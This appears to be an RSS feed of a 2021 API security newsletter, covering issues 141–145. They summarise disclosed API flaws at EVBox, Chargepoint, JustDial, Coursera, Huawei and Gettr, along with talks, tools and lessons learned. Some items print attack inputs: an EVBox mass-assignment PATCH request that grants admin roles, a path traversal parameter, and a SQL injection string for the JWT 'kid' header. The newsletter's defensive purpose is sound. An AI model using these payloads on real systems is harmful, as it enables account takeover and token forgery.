<li><strong>EVBox</strong> had an API flaw that allowed unprivileged accounts to be escalated as administrators through what seems to have been a <a href="https://apisecurity.io/encyclopedia/content/owasp/api6-mass-assignment" target="_blank" rel="noopener noreferrer">mass assignment vulnerability</a>. In a profile update call, a user could add additional roles (possible values discoverable through error messages) as the <code>roles</code> array, and the backend just applied the requested change. By adding the tenant admin role to their user, attackers could take over  <em>all</em> charging stations in that tenant:
<pre class="line-numbers"><code class="language-http">PATCH /api/users/profiles/00uascl0k2XXZXT8w416 HTTP/1.1
Host: api[.]everon[.]io
Accept: application/json, text/plain, */*

{"profile":{"firstName":"egw",
"roles":["ADMIN","ACCOUNT_OWNER", "tenantadmin"]
}}</code></pre>
</li>
</ul>
<ul>
<li><strong> Chargepoint</strong>, a charging infrastructure provider with about 150,000 stations globally, had a GraphQL endpoint that allowed introspection, thus exposing customer database details. The researchers didn&#8217;t retrieve or manipulate any data as they assumed this was a production system with real customer information.<br />
<img loading="lazy" decoding="async" class="size-full wp-image-8338 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/08/Chargepoint_ev-ch-1-1.jpg" alt="" width="800" height="392" /></li>
</ul>
<p>All vendors have since fixed the vulnerabilities, but the magnitude of what could potentially have been achieved through them is quite chilling here.</p>
<p>Lessons learned:</p>
<ul>
<li>In the world of the Internet of Things (IoT), API security — or the lack of it — can have significant privacy, personal, and even national security consequences.</li>
<li>Authentication, authorization, and data validation are all extremely important and serve as the foundation of API security.</li>
<li>If using GraphQL, learn more about its security and don&#8217;t just go with the defaults.</li>
</ul>
<h2>Training: The Nuts and Bolts of OAuth 2.0</h2>
<p>Learn OAuth from one of its creators! Aaron Parecki has released his <a href="https://www.udemy.com/course/oauth-2-simplified/" target="_blank" rel="noopener noreferrer">&#8220;The Nuts and Bolts of OAuth 2.0&#8221; class on Udemy</a> that covers:</p>
<ul>
<li>OAuth 2.0</li>
<li>OpenID</li>
<li>PKCE</li>
<li>Deprecated flows</li>
<li>JSON web tokens (JWTs)</li>
<li>API gateways</li>
<li>Scopes</li>
</ul>
<p>No programming knowledge is needed. Here&#8217;s a 5-minute intro video:</p>
<p><iframe loading="lazy" title="What is OAuth and why does it matter? - OAuth in Five Minutes" width="640" height="360" src="https://www.youtube.com/embed/KT8ybowdyr0?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Analysts: Gartner Hype Cycle on APIs</h2>
<p>Gartner Hype Cycles offer nice visual representations of where the technologies are in terms of their hype, maturity, and adoption.</p>
<p>Mark O&#8217;Neill and John Santoro have just released their &#8220;<a href="https://www.gartner.com/en/documents/4004085" target="_blank" rel="noopener noreferrer">Hype Cycle for APIs and Business Ecosystems, 2021</a>&#8221; report. As the chart below shows, API security testing is sharply on the rise (as are Graph APIs), API threat protection is still near the top but further along the maturity route.</p>
<p>See the full report (behind a paywall) for more details on the technologies mentioned.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8333 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/08/Gartner_Hype_Cycle_for_APIs_2021.jpg" alt="" width="800" height="544" /></p>
<h2>Video: Traversing My Way in the Internal Network</h2>
<p>A huge number of APIs these days are APIs exposed by microservice-based applications. This means that the APIs exposed by an app are implemented as microservices that receive your call and likely make their own API calls to other, more back-end microservices in the system.</p>
<p>For example, a call to <code>api/v1/user?id=1337</code> might mean that this microservice is making its call to <code><em>some_internal_domain</em>/users/1337</code>.</p>
<p>That backend likely blindly trusts the frontend microservice, and if there is no data validation in place, an attacker may be able to get to other parts of the system by manipulating the parameters in the API call. For example, calling <code>api/v1/user?id=1337/../../</code> might get translated to <code><em>some_internal_domain</em>/users/1337/../../</code> and thus normalized to <code><em>some_internal_domain</em>/</code>, getting to the root of the backend.</p>
<p>Watch this recording of a talk by Jasmin Landry at a recent OWASP event in which he covers the traversal attacks that can come out of microservices architecture. He discusses various variants of potentially dangerous API inputs (query parameters, path parameters, JSON payloads), as well as his real-life experience in finding and reporting such vulnerabilities:</p>
<p><iframe loading="lazy" title="Traversing My Way in the Internal Network - Jasmin Landry (@JR0ch17)" width="640" height="360" src="https://www.youtube.com/embed/f5IEe5r9to8?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>Lessons learned from this one:</p>
<ul>
<li>Zero trust approach and diligent data validation are really important. Define and enforce all your API inputs (parameters and payloads) as well as outputs in all your API definitions.</li>
<li>Validate and enforce all allowed paths and operations.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-145-apis-electric-car-charging-stations-nuts-bolts-oauth-2-0/">Issue 145: APIs and electric car charging stations, The Nuts and Bolts of OAuth 2.0</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 144: JustDial API vulnerability re-emerges, API key checker, the state of OAuth</title>
		<link>https://apisecurity.io/issue-144-justdial-api-vulnerability-re-emerges-api-key-checker-state-oauth/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 28 Jul 2021 22:00:34 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8317</guid>

					<description><![CDATA[<p>This week, JustDial has had to re-fix an old API vulnerability that they already fixed in 2019. We also have a set of scripts for automated API key validation, and two videos from recent conferences on the OAuth roadmap and GraphQL security. Vulnerability: JustDial JustDial had a regression as they accidentally reintroduced the API vulnerability [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-144-justdial-api-vulnerability-re-emerges-api-key-checker-state-oauth/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-144-justdial-api-vulnerability-re-emerges-api-key-checker-state-oauth/">Issue 144: JustDial API vulnerability re-emerges, API key checker, the state of OAuth</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, JustDial has had to re-fix an old API vulnerability that they already fixed in 2019. We also have a set of scripts for automated API key validation, and two videos from recent conferences on the OAuth roadmap and GraphQL security.</p>
<h2>Vulnerability: JustDial</h2>
<p>JustDial had a regression as they accidentally reintroduced the API vulnerability that they had fixed (<a href="https://apisecurity.io/issue-28-breaches-tchap-shopify-justdial/" target="_blank" rel="noopener noreferrer">and we reported</a>) back in 2019. Ironically, it was <a href="https://twitter.com/rajaharia/status/1419914156145221632" target="_blank" rel="noopener noreferrer">found and resubmitted to the vendor by the same reporter as last time, Rajshekhar Rajaharia</a>.</p>
<p>The vulnerable endpoint got re-introduced at some point in 2020 and had been leaking user data — such as names, email addresses, mobile numbers, addresses, gender, dates of birth, photos, occupation, and company names — for months. It is unclear whether anyone has taken advantage of the vulnerability.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8320 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/JustDial_data.jpg" alt="" width="600" height="338" /></p>
<p>As we mentioned when originally reporting the issue, even back in 2019 this was actually not an API used by JustDial apps. Rather, this was some sort of unused old API that was accidentally left behind and that provided unprotected access to the production database.</p>
<p>Lessons learned:</p>
<ul>
<li>This can serve as an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api9-improper-assets-management" target="_blank" rel="noopener noreferrer">OWASP API9 — Improper Assets Management</a>. Make sure that things you no longer need are properly retired.</li>
<li>Like any bug, security issues can come back unless you have automated testing processes to prevent this from happening. Use the DevSecOps approach and tooling to set up the process also for API security.</li>
<li>Ensure that only production APIs can access your production database: use mutual TLS authentication, IP allowlisting, and so on.</li>
<li>Ensure that <em>all</em> your APIs have proper authentication and authorization in place.</li>
</ul>
<h2>Tools: Key-Checker</h2>
<p>Leaked API keys remain one of the primary vectors of API breaches. Because of this, penetration testers often automate the search for API keys.</p>
<p>To make the discovery effective, it makes sense to also automate validating the found API keys: verify that the keys are indeed valid, still functional, and give access to the target system.</p>
<p><a href="https://github.com/daffainfo/Key-Checker" target="_blank" rel="noopener noreferrer">Muhammad Daffa has created an open source project called Key-Checker</a> that validates the API keys that you find across 37 different systems, including Facebook, GitHub, MailGun, SendGrid, Stripe, Twilio, to name but a few. So if you are looking to make your pentester life slightly easier, do check this one out.</p>
<h2>Video: The State of OAuth</h2>
<p>The conference apidays has published the recorded session &#8220;The State of OAuth&#8221; by Aaron Parecki.</p>
<p>Parecki is one of the creators of the OAuth standard and deeply involved in its maintenance and evolution. OAuth 2.0 — along with OpenID Connect that is based on OAuth — is the foundation of modern API authentication and delegated access. Yet, it can be quite confusing because of all the standards, technologies, and implementation options around it.</p>
<p>In his session, Parecki covers the origins and goals of the OAuth 1.0, OAuth 2.0, and OAuth 2.1 standards (RFCs) that define OAuth, adjacent technologies, tokens and their security, upcoming standards and extensions, and the upcoming Grant Negotiation and Authorization Protocol (GNAP). Worth watching if you are interested in how OAuth got where it is and what&#8217;s next.</p>
<p><iframe loading="lazy" title="Apidays LIVE interface 2021 - The State of OAuth by Aaron Parecki" width="640" height="360" src="https://www.youtube.com/embed/W5ajhfWmvHE?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Video: Damn GraphQL &#8211; Defending and Attacking APIs</h2>
<p>Another great recording this week is Dolev Farhi&#8217;s &#8220;Damn GraphQL &#8211; Defending and Attacking APIs&#8221; from BSides Vancouver.</p>
<p>Farhi is the creator of the Damn Vulnerable GraphQL Application (DVGA) <a href="https://apisecurity.io/issue-121-vulnerability-chess-com-graphql-security-playground-checklist/" target="_blank" rel="noopener noreferrer">that we covered in our issue 121</a> so he definitely knows a lot about GraphQL security.</p>
<p>In the video, Farhi explains the attack surface of GraphQL, the measures that API providers need to take to prevent exploits, his DVGA GraphQL vulnerability sandbox. To demonstrate the dangers of GraphQL vulnerabilities he even demos a simple GraphQL request that brings down a WordPress server that has a GraphQL plugin deployed.</p>
<p><iframe loading="lazy" title="Damn GraphQL - Defending and Attacking APIs - Dolev Farhi" width="640" height="360" src="https://www.youtube.com/embed/EVRf708-zq4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-144-justdial-api-vulnerability-re-emerges-api-key-checker-state-oauth/">Issue 144: JustDial API vulnerability re-emerges, API key checker, the state of OAuth</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 143: GraphQL API leaking credit cards, SQLi in JWT, XML attacks mind map</title>
		<link>https://apisecurity.io/issue-143-graphql-api-leaking-credit-cards-sqli-jwt-xml-attacks-mind-map/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 21 Jul 2021 12:38:00 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8292</guid>

					<description><![CDATA[<p>This week, we have a detailed write-up on finding credit card numbers leaking from a GraphQL API, a lab walkthrough on hacking JSON web tokens (JWT) through SQL injection, and HackerOne&#8217;s new Capture The Flag (CFT) API Security challenge. On the resource side, we have another good mind map, this time on XML attack vectors [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-143-graphql-api-leaking-credit-cards-sqli-jwt-xml-attacks-mind-map/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-143-graphql-api-leaking-credit-cards-sqli-jwt-xml-attacks-mind-map/">Issue 143: GraphQL API leaking credit cards, SQLi in JWT, XML attacks mind map</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a detailed write-up on finding credit card numbers leaking from a GraphQL API, a lab walkthrough on hacking JSON web tokens (JWT) through SQL injection, and HackerOne&#8217;s new Capture The Flag (CFT) API Security challenge. On the resource side, we have another good mind map, this time on XML attack vectors with APIs.</p>
<h2>Case study: Cracking encrypted credit card numbers exposed by an API</h2>
<p>Craig Hays has published <a href="https://infosecwriteups.com/cracking-encrypted-credit-card-numbers-exposed-by-api-977c6f7b996f" target="_blank" rel="noopener noreferrer">a fascinating write-up from his recent pentesting in a private bug bounty program</a>.</p>
<p>The company allowed their customer to store their credit cards for ease of use. Hays managed to retrieve and decode credit card numbers that the system stored for all their customers.</p>
<p>The application used a GraphQL API under the hood. Hays found the &#8216;about me&#8217; call that was susceptible to <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization (BOLA) attacks</a>. He could call that endpoint to enumerate each user in the system and retrieve their profile information.</p>
<p>He found that the API exposed much too much data on each user and even returned stored credit cards on file. The credit card numbers were encrypted. However, Hays noticed that the encryption was 2-way and unsalted, meaning that supplying a specific credit card number to save would always return the same, specific encrypted version of the number.</p>
<p>Considering that the credit card numbers are not completely random but conform to an international standard, he could create a script to enumerate all possible credit card numbers and create a rainbow table of their encrypted counterparts in the system. With such a table, he could then decrypt each card number he got from the API to cleartext by simply finding it in the table.</p>
<p>As Hays notes in his write-up, the main lesson learned here is again to tightly lock down your API responses and avoid exposing any more data than strictly necessary. Other things to consider:</p>
<ul>
<li>As always with cases of BOLA, make sure that on top of authentication, the authorization checks are in place and enforced, so that users can only access data they are supposed to.</li>
<li>Rate limiting can help prevent easy enumeration with a flood of calls. We discussed in our <a href="https://apisecurity.io/issue-142-api-vulnerabilities-coursera-huawei-graphql-rate-limiting-discovery/" target="_blank" rel="noopener noreferrer">last week&#8217;s newsletter</a> the quirks of rate-limiting with GraphQL APIs.</li>
<li>If using encryption, make sure to use modern best practices: adding salt to randomize the results, and so on.</li>
</ul>
<h2>Lab walkthrough: Hacking JWTs with Blind SQLi</h2>
<p>JWTs are one of the most frequently used methods to pass caller information in authentication tokens of REST API calls. When <span class="link-complex-target">JWTs</span> retrieve signing keys from a database using the keyID (<code>kid</code>) header, this itself can become a SQL injection attack vector.</p>
<p>If the API implementation blindly uses <code>kid</code> to retrieve the key from a database, attackers can pass a SQL injection such as &#8220;<code>non-existent-index’ UNION SELECT ‘ATTACKER’; --</code>&#8220;. Unsanitized SQL request like this will produce &#8220;<code>ATTACKER</code>&#8221; as the retrieved value. Thus, API would now be verifying JWT signature with the value that the attacker supplied &#8211; making it possible for the attacker to forge any tokens they like.</p>
<p>Shivlam Bathla from Pentester Academy has put together a great lab <a href="https://blog.pentesteracademy.com/hacking-jwt-tokens-blind-sqli-efa2799f0e95" target="_blank" rel="noopener noreferrer">&#8220;Hacking JWT Tokens: Blind SQLi&#8221;</a> for hands-on experience.</p>
<p>For those too busy to try this themselves, there is a step-by-step walkthrough on how the lab and the attack progresses, but you can also just read the intro for the task description and try to figure it out yourself with the lab.</p>
<p>If you need an overview of JWT and possible JWT attacks, see the <a href="https://youtu.be/M3jA0bGDCso" target="_blank" rel="noopener noreferrer">recording from my JWT security talk</a> at AppSec California 2020. Isabelle Mauny and I also did a <a href="https://youtu.be/Eq-LiFJbvXo" target="_blank" rel="noopener noreferrer">webinar on the approach to externalize JWT security checks</a>.</p>
<h2>Capture the Flag: API security</h2>
<p>CTF challenges are fun security quests and a great way to test your penetration testing skills in action.</p>
<p>HackerOne has just released a new &#8220;RTFM&#8221;-level <a href="https://ctf.hacker101.com/" target="_blank" rel="noopener noreferrer">CTF by Adam Langley, specifically dedicated to API security</a>. If you are looking for a fun way to hone your skills, check it out.</p>
<h2>Mind map: XML attacks</h2>
<p><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0">APIs that accept XML payloads can be exposed to various XML-related attacks if they do not properly define and validate these payloads.</span></p>
<p><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0">Harsh Bothra</span><span class="css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0"> has put together a mind map of possible XML attack vectors, both as a <a href="https://www.xmind.net/m/xNEY9b/" target="_blank" rel="noopener noreferrer">XMind map</a> and a <a href="https://drive.google.com/file/d/1xUqA0LLDP9bKM4gZ26v-LHyLSbqrUGdk/view" target="_blank" rel="noopener noreferrer">PDF</a>. Many of the attack vectors also provide reference links to further reading.</span></p>
<p><a href="https://www.xmind.net/m/xNEY9b/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class=" wp-image-8293 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/XML_attacks_mindmap.jpg" alt="" width="420" height="539" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-143-graphql-api-leaking-credit-cards-sqli-jwt-xml-attacks-mind-map/">Issue 143: GraphQL API leaking credit cards, SQLi in JWT, XML attacks mind map</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 142: API vulnerabilities in Coursera and Huawei, GraphQL rate limiting and discovery</title>
		<link>https://apisecurity.io/issue-142-api-vulnerabilities-coursera-huawei-graphql-rate-limiting-discovery/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 14 Jul 2021 22:00:31 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8273</guid>

					<description><![CDATA[<p>This week, we take a look at the recently reported API vulnerabilities at Coursera and in one of the Huawei home gateways. We also learn about rate-limiting for GraphQL APIs and GraphQL discovery using its autocorrect feature. Vulnerability: Coursera Coursera has fixed a number of API vulnerabilities reported by David Sopas, Paulo Silva, Ricardo Gonçalves, [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-142-api-vulnerabilities-coursera-huawei-graphql-rate-limiting-discovery/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-142-api-vulnerabilities-coursera-huawei-graphql-rate-limiting-discovery/">Issue 142: API vulnerabilities in Coursera and Huawei, GraphQL rate limiting and discovery</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recently reported API vulnerabilities at Coursera and in one of the Huawei home gateways. We also learn about rate-limiting for GraphQL APIs and GraphQL discovery using its autocorrect feature.</p>
<h2>Vulnerability: Coursera</h2>
<p><a href="https://www.checkmarx.com/blog/technical-blog/api-crash-course-broken-object-level-authorization-found-in-coursera/" target="_blank" rel="noopener noreferrer">Coursera has fixed a number of API vulnerabilities</a> reported by David Sopas, Paulo Silva, Ricardo Gonçalves, and Erez Yalon from Checkmarx:</p>
<ul>
<li>Lack of authentication and authorization for reading or modifying user preferences</li>
<li>Account enumeration using the password reset endpoint</li>
<li>Lack of resource limiting</li>
<li>GraphQL misconfiguration</li>
</ul>
<p>Their article explains how they found the first of the issues. While using various functions of the web app and observing the API calls that the site was making, they noticed <code>GET</code> calls to the endpoint <code>/api/userPreferences.v1/{USER_ID}~{PREFERENCE_TYPE}</code> that could retrieve 10 different types of user preferences.</p>
<p>When replacing the <code>USER_ID</code> of the authenticated user with that of another user, they noticed that they could still access the preferences data, demonstrating a lack of authorization check in the API. Even worse, they noticed that even without any authentication headers or cookies, they could still access the data, thus showing that the API was not protected by any authentication checks either:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8277 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/Coursera_retrieve_preferences.jpg" alt="" width="1428" height="658" /></p>
<p>Finally, they tried making <code>PUT</code> calls instead of <code>GET</code> and successfully modified user preferences through that same unprotected endpoint:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8278 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/Coursera_modify_preferences.jpg" alt="" width="1424" height="653" /></p>
<p>Obviously a significant breach of user privacy.</p>
<p>Lessons learned here:</p>
<ul>
<li>Treat your backend APIs as your security boundary, and make sure they are up to it.</li>
<li>Ensure that both authentication and authorization checks are in place.</li>
</ul>
<h2>Vulnerability: Huawei DG8045</h2>
<p>Device manufacturers often resort to default passwords to make the initial setup easier for consumers. If these passwords are not random, they can make such devices vulnerable to attacks.</p>
<p>A researcher found that <a href="https://twitter.com/wugeej/status/1408315352589553665" target="_blank" rel="noopener noreferrer">Huawei DG8045 home gateway uses the last 8 characters of the device serial number as the default password</a>.</p>
<p>To make things worse, the device exposes that number through a public API call <code>GET /api/system/deviceinfo</code>:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8274 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/vulnerable_Huawei_dg8045_API.jpg" alt="" width="600" height="559" /></p>
<p>This means that if users don&#8217;t change the default password, they clearly risk attackers taking over their home gateway.</p>
<p>Lessons learned here:</p>
<ul>
<li>Non-random default credentials are extremely dangerous and should be avoided.</li>
<li>APIs need to be protected with authentication and authorization.</li>
<li>The information that your APIs return must be clearly defined, reviewed, and enforced to avoid leaking sensitive information.</li>
<li>As a user, always change the password of any device, especially if it has a hard-coded default password, or the password is easily retrievable (like printed on the device or an easy unauthenticated API call).</li>
</ul>
<h2>Best practices: GraphQL and rate-limiting</h2>
<p><a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting" target="_blank" rel="noopener noreferrer">API4:2019 — Lack of resources and rate-limiting</a> can be a serious API vulnerability. Attackers can stage denial-of-service (DoS) attacks making the system unresponsive, or launch brute-force or scraping scripts to break into the system or retrieve its data. Traditionally, such attacks are prevented with rate limiting, the number of times within a period of time that an API client can call the API.</p>
<p><a href="https://shopify.engineering/rate-limiting-graphql-apis-calculating-query-complexity" target="_blank" rel="noopener noreferrer">As Guilherme Vieira from Shopify explains in his article</a>, this approach is not sufficient for GraphQL APIs. GraphQL is effectively a query language over REST APIs that allows sending complex queries and retrieving or modifying multiple objects in one call. This means that some calls can cause a lot more resource consumption than others, making request-based rate-limiting inefficient. One size clearly does not fit all.</p>
<p>To overcome the problem, engineers at Shopify use a point system. API clients get a certain number of complexity points that they can use within a period of time, such as 50 points per second up to a limit of 1,000 points. Then each query gets its complexity score calculated:</p>
<ul>
<li>Objects: One point</li>
<li>Scalars and enums: Zero points</li>
<li>Connections: Two points plus the number of returned objects</li>
<li>Interfaces and unions: One point</li>
<li>Mutations: Ten points</li>
</ul>
<p>The API responses returned to the caller include information on how many points were used and how many remain.</p>
<p>All this makes sure that no API client can go wild and consume more API resources than it is allowed. For more details and specific examples, see the original article.</p>
<h2>Penetration testing: Attacking GraphQL Autocorrect</h2>
<p>Penetration testers seek to find GraphQL schema information so they can build queries to retrieve the application data. As we have discussed in this newsletter multiple times, this is why it is important to make sure that introspection on GraphQL is not allowed in your production deployments.</p>
<p>In this recording from the null Ahmedabad June Meet, Somdev Sangwan discusses how the Autocorrect feature in GraphQL can be used as an attack vector even after introspection has been switched off, still allowing attackers to discover the schema. His part starts around the 33-minute mark:</p>
<p><iframe loading="lazy" title="null Ahmedabad Meet 20 June 2021 Monthly Meet" width="640" height="360" src="https://www.youtube.com/embed/ElQmEn-6dpE?start=1980&#038;feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-142-api-vulnerabilities-coursera-huawei-graphql-rate-limiting-discovery/">Issue 142: API vulnerabilities in Coursera and Huawei, GraphQL rate limiting and discovery</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 141: API vulnerabilities in VeryFitPro and Gettr, AWS Lambda authorizers, AsyncAPI 2.1</title>
		<link>https://apisecurity.io/issue-141-api-vulnerabilities-veryfitpro-gettr-aws-lambda-authorizers-update-asyncapi/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 07 Jul 2021 22:00:11 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8249</guid>

					<description><![CDATA[<p>This week, we take a look at insecure API traffic in the VeryFitPro Android app, how APIs were used to scrape user profile data from Gettr, and some potential API vulnerabilities affecting AWS API Gateway and Lambda authorizers users. In addition, there is also the latest update to the AsyncAPI standard. Vulnerability: VeryFitPro Researchers from [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-141-api-vulnerabilities-veryfitpro-gettr-aws-lambda-authorizers-update-asyncapi/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-141-api-vulnerabilities-veryfitpro-gettr-aws-lambda-authorizers-update-asyncapi/">Issue 141: API vulnerabilities in VeryFitPro and Gettr, AWS Lambda authorizers, AsyncAPI 2.1</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at insecure API traffic in the VeryFitPro Android app, how APIs were used to scrape user profile data from Gettr, and some potential API vulnerabilities affecting AWS API Gateway and Lambda authorizers users. In addition, there is also the latest update to the AsyncAPI standard.</p>
<h2>Vulnerability: VeryFitPro</h2>
<p>Researchers from Trovent Security have found<a href="https://trovent.io/security-advisory-2105-01" target="_blank" rel="noopener noreferrer"> a serious API vulnerability in VeryFitPro</a>, an Android app with more than 10 million downloads.</p>
<p>It turned out that the app was communicating to the backend API in the cloud over cleartext HTTP protocol.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8251 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/veryfitpro_cleartext_api_call.jpg" alt="" width="1471" height="1251" /></p>
<p>This means that an attacker on the same network (for example, an open WiFi network) could intercept the API traffic, including calls for login or password reset. Thus, besides intercepting sensitive data, attackers could even fully take over the victim&#8217;s account.</p>
<p>To make things worse, the app publisher has not responded to the researchers&#8217; report and has left the issue unaddressed.</p>
<p>Lessons learned:</p>
<ul>
<li>It is 2021 and there is absolutely no reason for <em>anyone</em> to use HTTP anymore. Your APIs should only accept encrypted HTTPS communications.</li>
<li>Implement a clear vulnerability disclosure program and promptly address reported security incidents.</li>
</ul>
<h2>Vulnerability: Gettr</h2>
<p>Gettr is a recently launched Twitter clone for Trump supporters. Within days after its launch, <a href="https://www.vice.com/en/article/dyv44m/hackers-scrape-90000-gettr-user-emails-surprising-no-one" target="_blank" rel="noopener noreferrer">attackers found vulnerable APIs and started leaking private user data</a>.</p>
<p>At least two issues have been reported:</p>
<ol>
<li>APIs behind the sign-up page returned a specific error if the supplied email address was already in use. To make things worse, there was no rate limiting in place, so attackers could run a script and iterate through a large number of email addresses to check if their owners had an account in Gettr.</li>
<li>Apparently, there was another unsecured API that returned various profile fields, including some not shown on the  Gettr UI, like email address, location, and year of birth.</li>
</ol>
<p>Security researcher Alon Gal found a post on a hacker forum that included data of more than 90 000 Gettr users:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8250 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/Gettr_user_profile_leak.png" alt="" width="1659" height="783" /></p>
<p>Lessons learned here:</p>
<ul>
<li>Be careful what kind of error messages your login and signup APIs return. There is a fine balance between informing users and leaking details. Prevent account lookups.</li>
<li>Implement rate-limiting (<a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting" target="_blank" rel="noopener noreferrer">OWASP API4:2019 — Lack of resources and rate-limiting</a>) and monitoring (<a href="https://apisecurity.io/encyclopedia/content/owasp/api10-insufficient-logging-and-monitoring" target="_blank" rel="noopener noreferrer">API10:2019 — Insufficient logging and monitoring</a>) to prevent API abuse.</li>
<li>Implement authentication (<a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>) and authorization (<a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object-level authorization</a>) to prevent attackers from accessing the private data of your customers.</li>
<li>Define and enforce API outputs to ensure that only the data that the API clients really need and that is OK to be exposed is returned (<a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a>)</li>
</ul>
<h2>Security research: AWS API Gateway and Lambda authorizers</h2>
<p>If your APIs are behind AWS API Gateway and use Lambda authorizers for access control, <a href="https://www.tenchisecurity.com/blog/thefaultinourstars" target="_blank" rel="noopener noreferrer">read this research by Alexandre Sieira and Leonardo Viveiro</a>.</p>
<p>Lambdas are serverless functions in AWS. Lambda authorizers are functions that AWS API Gateway can call to perform authorization checks:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8252 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/lambda_authorizers_architecture.png" alt="" width="800" height="450" /></p>
<p>Lambda authorizers return JSON objects with the structure shown below. This structure has the property <code>policyDocument</code> that includes the address of the resource in AWS to which the authorization applies:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8253 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/lambda_authorizer_response_object.png" alt="" width="1600" height="626" /></p>
<p>The vulnerability arises when wildcards are used in the <code>Resource</code> path. The wildcards allow for <code>*</code> meaning any number of any characters. There is a huge range of possible ways that these can be interpreted. On the one hand, they can match an empty string, on the other &#8211; as many characters as they can and would not stop at separators like colons or slashes.</p>
